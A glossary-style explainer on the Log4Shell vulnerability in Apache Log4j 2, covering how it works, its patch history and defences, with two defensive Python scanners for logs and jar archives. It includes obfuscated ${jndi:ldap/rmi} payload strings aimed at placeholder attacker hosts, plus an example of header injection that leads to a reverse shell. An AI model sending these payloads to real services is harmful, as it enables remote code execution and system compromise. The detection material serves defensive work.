Log4Shell (CVE-2021-44228)
What is Log4Shell (CVE-2021-44228)?
A critical December 2021 remote code execution vulnerability in Apache Log4j 2 that allowed attackers to run arbitrary code by logging a single JNDI lookup string.
Log4Shell is a CVSS 10.0 vulnerability in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1), reported to Apache by Chen Zhaojun of Alibaba Cloud's security team and disclosed publicly on 9 December 2021. Log4j's message-lookup feature evaluated ${...} expressions inside logged messages, so a value such as ${jndi:ldap://attacker/x} made the JVM perform a JNDI lookup against an attacker-controlled LDAP server. The server's reply could point the JVM at a remote class to download and instantiate, or carry a serialised Java object to deserialise; either path yields remote code execution with the privileges of the application. Newer JDKs refuse remote codebases by default, but that was no protection: attackers fell back to serialised objects and to factory classes already on the application's classpath. Because Log4j is bundled in countless Java applications and appliances, any attacker-controlled value that reached a log line (a User-Agent header, a search box, a filename, even an iPhone device name) became a trigger, and because lookups were resolved recursively, encodings such as ${${lower:j}ndi:...} slipped past naive string filters.
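The recursive lookup resolution described above is what defeats a simple grep for the literal string ${jndi:. The scanner below, an added example that is not part of the original page and not Apache's code, normalises a log line the way Log4j's substitutor would for the pieces attackers abuse (lower, upper and the ${key:-default} fallback syntax) and only then matches the jndi: prefix. The access-log lines and the host attacker.example are constructed for the demonstration; real Log4j supports many more lookup types (sys, env, date, ctx, ...), so this is a detection aid for log and WAF telemetry, not a substitute for patching.

```python
import re

# Innermost lookup: a ${...} whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Once nesting is collapsed, a jndi: prefix with a JNDI-capable scheme is a hit.
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|nis|http)", re.I)


def _resolve(body):
    """Evaluate one lookup the way attackers rely on Log4j's StrSubstitutor to:
    lower/upper lookups and the "${key:-default}" fallback syntax. Other lookups
    keep their text (braces dropped) so nothing is hidden from the matcher.
    This is a deliberate simplification of Log4j's full lookup set."""
    key, has_default, default = body.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()              # Log4j lower-cases the lookup prefix
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "jndi":
        return key                       # keep the JNDI reference visible
    if has_default:
        return default                   # e.g. ${::-j} or ${env:UNSET:-j} -> "j"
    return key


def normalize(text, max_rounds=20):
    """Collapse nested lookups from the inside out. The round limit keeps a
    deliberately deep payload from spinning the scanner."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(text):
    return _JNDI.search(normalize(text)) is not None


def scan_lines(lines):
    """Return (original line, normalised form) for each line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((line, norm))
    return hits


# Constructed access-log lines for demonstration; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/x}"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/x}"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${upper:l}${lower:d}ap://attacker.example/x}"',
    '203.0.113.11 - - "GET /?q=${date:yyyy-MM-dd} HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for line, norm in scan_lines(SAMPLE_LOG):
        print(f"HIT  {line}\n  -> {norm}")
```

Running the block flags the four payload lines and leaves the benign ${date:...} lookup alone. Because the normalised form is returned alongside the raw line, an analyst sees the decoded jndi:ldap://attacker.example/x target rather than the obfuscated original, which is what you want to pivot on when hunting for the callback in egress logs.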
Patching was a multi-stage scramble: 2.15.0 disabled message lookups by default but was incomplete (CVE-2021-45046, a denial of service that became RCE in some non-default configurations); 2.16.0 removed message lookups entirely and disabled JNDI by default; 2.17.0 fixed a lookup-recursion denial of service (CVE-2021-45105); and 2.17.1 addressed CVE-2021-44832, remote code execution through a JDBC Appender configured with an attacker-controlled JNDI data source. Apache's recommended fixed releases are 2.17.1 for Java 8 and later, 2.12.4 for Java 7 and 2.3.2 for Java 6. Mass exploitation began within hours of disclosure; CISA added the CVE to its Known Exploited Vulnerabilities catalog, and it was abused by ransomware crews and by Iranian state-sponsored actors, who CISA reported used it against unpatched VMware Horizon servers to get into a U.S. federal network. Defences: upgrade log4j-core to one of the fixed releases above; where the upgrade must wait, delete org/apache/logging/log4j/core/lookup/JndiLookup.class from the log4j-core jar, the only workaround Apache continued to recommend; treat log4j2.formatMsgNoLookups=true (or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable) as a partial measure only, because it exists only in 2.10 through 2.14.1 and Apache later listed it as discredited since it does not cover the CVE-2021-45046 cases; block outbound LDAP, RMI and unexpected HTTP from application hosts so a lookup that does fire cannot fetch a payload; and use an SBOM or a scan of jars, WARs and fat jars to locate every embedded copy, including shaded copies that package managers never see.
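Finding every embedded copy is the step most teams got wrong, because log4j-core rides inside WARs, EARs and fat jars that the OS package manager and a naive `find` never open. The scanner below is an added example (not the page's or Apache's tooling): it walks a directory, opens each archive in memory, recurses into nested archives, reads the Maven pom.properties that log4j-core ships with to get the version, checks whether JndiLookup.class is still present, and maps the result onto the fix releases listed in the paragraph above for the 2.x, 2.12.x (Java 7) and 2.3.x (Java 6) branches. Assumptions: the fix-version table is transcribed from the advisories summarised above; a shaded build without pom.properties is reported with version None for manual review; the test archives built below are constructed, not real Log4j jars.

```python
import io
import re
import zipfile
from pathlib import Path

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED = (".jar", ".war", ".ear", ".zip")

# (CVE, first fixed release on the 2.x / 2.12.x (Java 7) / 2.3.x (Java 6) branches),
# transcribed from Apache's advisories as summarised in the text above.
CVES = [
    ("CVE-2021-44228", (2, 15, 0, 1), (2, 12, 2, 1), (2, 3, 1, 1)),
    ("CVE-2021-45046", (2, 16, 0, 1), (2, 12, 2, 1), (2, 3, 1, 1)),
    ("CVE-2021-45105", (2, 17, 0, 1), (2, 12, 3, 1), (2, 3, 1, 1)),
    ("CVE-2021-44832", (2, 17, 1, 1), (2, 12, 4, 1), (2, 3, 2, 1)),
]


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 1); '2.0-beta9' -> (2, 0, 0, 0), so pre-releases sort first."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-\S+)?$", text.strip())
    if not m:
        return None
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if pre else 1)


def _fixed(v, main, java7, java6):
    """True if v is at or past the fix release for its own branch."""
    if (2, 12, 0, 0) <= v < (2, 13, 0, 0):
        return v >= java7
    if (2, 3, 0, 0) <= v < (2, 4, 0, 0):
        return v >= java6
    return v >= main


def exposure(version, jndi_class_present):
    """List the Log4Shell-era CVEs a log4j-core copy is still exposed to."""
    v = parse_version(version) if version else None
    if v is None:
        return ["unknown version: inspect manually"]
    open_cves = [cve for cve, main, j7, j6 in CVES if not _fixed(v, main, j7, j6)]
    if not jndi_class_present:
        # With JndiLookup.class removed the JNDI lookup cannot fire, which covers the
        # two JNDI CVEs but not the recursion DoS or the JDBC Appender issue.
        open_cves = [c for c in open_cves if c not in ("CVE-2021-44228", "CVE-2021-45046")]
    return open_cves


def scan_archive(data, label, results):
    """Inspect one archive held in memory and recurse into archives nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        has_class = JNDI_CLASS in names
        if POM_PROPS in names or has_class:
            version = None
            if POM_PROPS in names:
                props = zf.read(POM_PROPS).decode("utf-8", "replace")
                m = re.search(r"^version=(.+)$", props, re.M)
                version = m.group(1).strip() if m else None
            results.append({"path": label, "version": version,
                            "jndi_lookup_class": has_class,
                            "open_cves": exposure(version, has_class)})
        for name in sorted(names):
            if name.lower().endswith(NESTED):
                scan_archive(zf.read(name), f"{label}!{name}", results)


def scan_tree(root):
    """Walk a directory and report every log4j-core copy, including nested ones."""
    results = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in NESTED:
            scan_archive(path.read_bytes(), str(path), results)
    return results


if __name__ == "__main__":
    import sys
    for r in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        state = "JndiLookup present" if r["jndi_lookup_class"] else "JndiLookup stripped"
        print(r["path"], r["version"], state, r["open_cves"])
```

Run it as `python scanner.py /opt/app` and treat every path with a non-empty open_cves list as a work item; the `!` in the path separates the outer archive from the nested jar, which is what you hand to the application team. A copy that reports CVE-2021-45105 and CVE-2021-44832 only is a stripped 2.14.x jar: the emergency workaround is in place, but the upgrade is still owed.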
flowchart TD
A[Attacker] -->|"input: ${jndi:ldap://evil/x}"| B[Java app logs the string]
B --> C[Log4j evaluates lookup]
C --> D[JNDI query to attacker LDAP server]
D --> E["Attacker's LDAP server replies with a remote class reference or a serialised object"]
E --> F["JVM loads the class or deserialises the object"]
F --> G[Remote code execution]
● Examples
- 01
Sending User-Agent: ${jndi:ldap://attacker.com/x} to a Java web app that logs request headers, then serving a payload from the attacker's LDAP and HTTP listeners to obtain a reverse shell.
- 02
Exploiting an internal Java service that logs failed logins by submitting the lookup string as the username.
● Frequently asked questions
What is Log4Shell (CVE-2021-44228)?
A critical December 2021 remote code execution vulnerability in Apache Log4j 2 that allowed attackers to run arbitrary code by logging a single JNDI lookup string. It belongs to the Vulnerabilities category of cybersecurity.
What does Log4Shell (CVE-2021-44228) mean?
A critical December 2021 remote code execution vulnerability in Apache Log4j 2 that allowed attackers to run arbitrary code by logging a single JNDI lookup string.
How do you defend against Log4Shell (CVE-2021-44228)?
Upgrade log4j-core to 2.17.1 or later (2.12.4 on Java 7, 2.3.2 on Java 6). If the upgrade must wait, remove the JndiLookup class from the log4j-core jar; do not rely on log4j2.formatMsgNoLookups alone. Block outbound LDAP, RMI and unexpected HTTP from application hosts, inventory every embedded copy with an SBOM or archive scan, and monitor logs and WAF telemetry for ${jndi: lookups, including nested and obfuscated forms.
What are other names for Log4Shell (CVE-2021-44228)?
Common alternative names include: CVE-2021-44228, Log4j vulnerability.